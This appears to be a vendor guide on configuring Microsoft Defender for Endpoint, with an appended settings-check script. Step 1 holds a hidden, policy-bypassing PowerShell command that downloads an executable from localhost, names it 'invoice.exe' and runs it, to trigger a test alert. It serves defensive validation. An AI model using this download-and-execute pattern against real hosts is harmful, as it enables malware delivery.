Configuration Essentials
    • 18 Jun 2024

    This article provides some configurations you can use with Microsoft Defender for Endpoint and Red Canary. This article is an adaptation of a presentation. You can view the slides, which contain additional details and images, by clicking the image below.

    As part of Microsoft’s suite of integrated threat protection products, Defender for Endpoint is a key component of many users' security plans. Red Canary configuration suggestions can be applied to Defender for Endpoint using several different management solutions, depending on your architecture. For example, Endpoint Manager (Intune), Group Policy, and so on. You only need to apply these configurations in your primary configuration management solution.

    For a guided walkthrough of these sections, review this video:

    Step 1: Validate your EDR deployment

    First you’ll generate a test alert in order to ensure your Defender for Endpoint deployment is fully operational.

    1. On an endpoint that has Defender installed, create the folder C:\test-MDATP-test.

    2. Open PowerShell with elevated permissions, and then execute the following command:

      powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
    3. Check the Defender for Endpoint dashboard for your test alert.


    Step 2: Ensure Microsoft Defender Antivirus is running in active mode

    In order for Defender for Endpoint policies to function, Defender Antivirus must be the active antivirus solution on the system.

    To check whether Defender Antivirus is running in active mode, open PowerShell and run Get-MPComputerStatus | Select AMRunningMode. The output should look like this:

    > Get-MPComputerStatus | Select AMRunningMode
    AMRunningMode
    -------------
    Normal

    For more information about why Defender Antivirus might switch to passive mode, see Microsoft Defender Antivirus and non-Microsoft antivirus/antimalware solutions.

    Step 3: Configure Next Generation Protection (NGAV)

    Next, you'll configure the core NGAV features by using either the Local Group Policy Editor or Endpoint Manager. The core NGAV features are cloud-delivered protection, which uses Microsoft Advanced Protection Services (MAPS) to assess suspicious binaries in real time, and real-time protection, which provides always-on monitoring of file and process activity together with heuristics to identify threats.

    Option 1: Configure NGAV using Group Policy

    1. Open the Local Group Policy Editor.

    2. Click Computer Configuration > Administrative Templates > Windows Components, then select Microsoft Defender Antivirus.

    3. Enable Allow antimalware service to start up with normal priority.

    4. Click Real-time Protection, and configure your settings to match the following:

      Setting                                                                                        State
      ---------------------------------------------------------------------------------------------  --------
      Turn off real-time protection                                                                  Disabled
      Turn on behavior monitoring                                                                    Enabled
      Scan all downloaded files and attachments                                                      Enabled
      Monitor file and program activity on your computer                                             Enabled
      Turn on raw volume write notifications                                                         Enabled
      Turn on process scanning whenever real-time protection is enabled                              Enabled
      Define the maximum size of downloaded files and attachments                                    Enabled
      Configure local setting override for turn on behavior monitoring                               Disabled
      Configure local setting override for scanning all downloaded files and attachments             Disabled
      Configure local setting override for monitoring file and program activity on your computer     Disabled
      Configure local setting override to turn on real-time protection                               Disabled
      Configure local setting override for monitoring for incoming and outgoing file activity        Disabled
      Configure monitoring for incoming and outgoing file and program activity                       Disabled

    5. Click MAPS.

    6. Click Join Microsoft MAPS, select Enabled, select Basic MAPS, and then click Ok.

    7. Click Send file samples when further analysis is required, select Enabled, select Send all samples, and then click Ok.

    Option 2: Configure NGAV using Endpoint Manager

    1. Log in to https://endpoint.microsoft.com/.

    2. Click Endpoint Security, Antivirus, and then click Create Policy.

    3. Under Platform, select Windows 10 and later.

    4. Under Profile, select Windows Defender Antivirus.

    5. Click Create, enter a name and description, and then click Next.

    6. Under Cloud protection, configure the following settings:

      Setting                               State
      ------------------------------------  ---------
      Turn on cloud-delivered protection    Yes
      Cloud-delivered protection level      High plus

    7. Under Real-time protection, configure the following settings:

      Setting                                           State
      ------------------------------------------------  -------------------------------
      Turn on real-time protection                      Yes
      Enable on access protection                       Yes
      Monitoring for incoming and outgoing files        Monitor all files
      Turn on behavior monitoring                       Yes
      Turn on intrusion protection                      Yes
      Enable network protection                         Enable
      Scan all downloaded files and attachments         Yes
      Scan scripts that are used in Microsoft browsers  Yes, if using Microsoft browsers
      Scan network files                                No
      Scan emails                                       Yes

    8. Click Next three times, and then click Create.

    Step 4: Enable tamper protection

    Tamper protection prevents malicious software from taking actions like disabling antivirus and removing security updates. You will need to enable tamper protection using either the Microsoft 365 Defender portal or Endpoint Manager.

    Tip: Red Canary recommends that you enable tamper protection using the 365 Defender portal. If you use Windows Server 2016 or Windows versions 1709, 1803, or 1809, you might need to use PowerShell to determine the tamper protection status.

    Option 1: Enable tamper protection using 365 Defender

    1. Log in to https://security.microsoft.com/.

    2. Click Settings > Endpoints, then select Advanced features.

    3. Turn on Tamper protection.

    4. Click Save preferences.

    Option 2: Enable tamper protection using Endpoint Manager

    1. Log in to https://endpoint.microsoft.com/.

    2. Click Devices, Configuration profiles, and then click Create profile.

    3. Under Platform, select Windows 10 or later.

    4. Under Profile type, select Endpoint protection.

    5. Click Create, enter a name and description, and then click Next.

    6. Select Microsoft Defender Security Center.

    7. From the Tamper Protection dropdown, select Enabled.

    8. Click Next three times, and then click Create.
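    The following verification script is an added example, not part of this article or of Red Canary's tooling. It reads the live Defender Antivirus state with Get-MpComputerStatus and Get-MpPreference and compares it with the states recommended in Steps 2, 3 and 4, so you can confirm on a sample endpoint that your Group Policy or Endpoint Manager policy actually landed. It assumes an elevated Windows PowerShell session on a device where the Defender module is present; the numeric expectations are the documented Set-MpPreference enum encodings.

```powershell
# Added verification script (not from the original article). Compares the live
# Defender Antivirus state with the states recommended in Steps 2 to 4 above.
# Assumes an elevated Windows PowerShell session with the Defender module available.
$status = Get-MpComputerStatus
$pref   = Get-MpPreference

# Each entry: a label, the observed value, and the set of acceptable values.
# Numeric values use the documented Set-MpPreference enum encodings.
$checks = @(
    # Step 2: Defender must be the active engine (not Passive or EDR Block mode)
    @{ Name = 'AMRunningMode';          Actual = $status.AMRunningMode;             Ok = @('Normal') }
    # Step 3: real-time protection
    @{ Name = 'RealTimeProtection';     Actual = $status.RealTimeProtectionEnabled; Ok = @($true) }
    @{ Name = 'BehaviorMonitoring';     Actual = $status.BehaviorMonitorEnabled;    Ok = @($true) }
    @{ Name = 'OnAccessProtection';     Actual = $status.OnAccessProtectionEnabled; Ok = @($true) }
    @{ Name = 'ScanDownloadsAndAttach'; Actual = $status.IoavProtectionEnabled;     Ok = @($true) }
    @{ Name = 'ScanDirection';          Actual = $pref.RealTimeScanDirection;       Ok = @(0) }      # 0 = incoming and outgoing
    @{ Name = 'NetworkProtection';      Actual = $pref.EnableNetworkProtection;     Ok = @(1) }      # 1 = Enabled (2 = Audit)
    @{ Name = 'DisableEmailScanning';   Actual = $pref.DisableEmailScanning;        Ok = @($false) } # article: Scan emails = Yes
    @{ Name = 'DisableScanNetworkFiles';Actual = $pref.DisableScanningNetworkFiles; Ok = @($true) }  # article: Scan network files = No
    # Step 3: cloud-delivered protection (MAPS)
    @{ Name = 'MAPSReporting';          Actual = $pref.MAPSReporting;               Ok = @(1, 2) }   # 1 = Basic, 2 = Advanced
    @{ Name = 'SubmitSamplesConsent';   Actual = $pref.SubmitSamplesConsent;        Ok = @(3) }      # 3 = Send all samples
    @{ Name = 'CloudBlockLevel';        Actual = $pref.CloudBlockLevel;             Ok = @(4) }      # 4 = High plus
    # Step 4: tamper protection
    @{ Name = 'TamperProtection';       Actual = $status.IsTamperProtected;         Ok = @($true) }
)

$results = foreach ($c in $checks) {
    [pscustomobject]@{
        Check    = $c.Name
        Actual   = $c.Actual
        Expected = ($c.Ok -join ' or ')
        Pass     = ($c.Actual -in $c.Ok)   # $null (property missing on older builds) fails as intended
    }
}
$results | Format-Table -AutoSize

$failed = @($results | Where-Object { -not $_.Pass })
if ($failed.Count -gt 0) {
    # Fix drift in your management solution (Group Policy or Endpoint Manager), not locally:
    # once tamper protection is on, protected settings cannot be changed on the device anyway.
    Write-Warning "$($failed.Count) setting(s) differ from the recommended configuration."
    exit 1
}
Write-Host 'All checked Defender settings match the recommended configuration.'
```

    Run it once after policy deployment and again after the next policy refresh; a check that passes on the first run and fails on the second usually means a local override is winning over the policy value.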
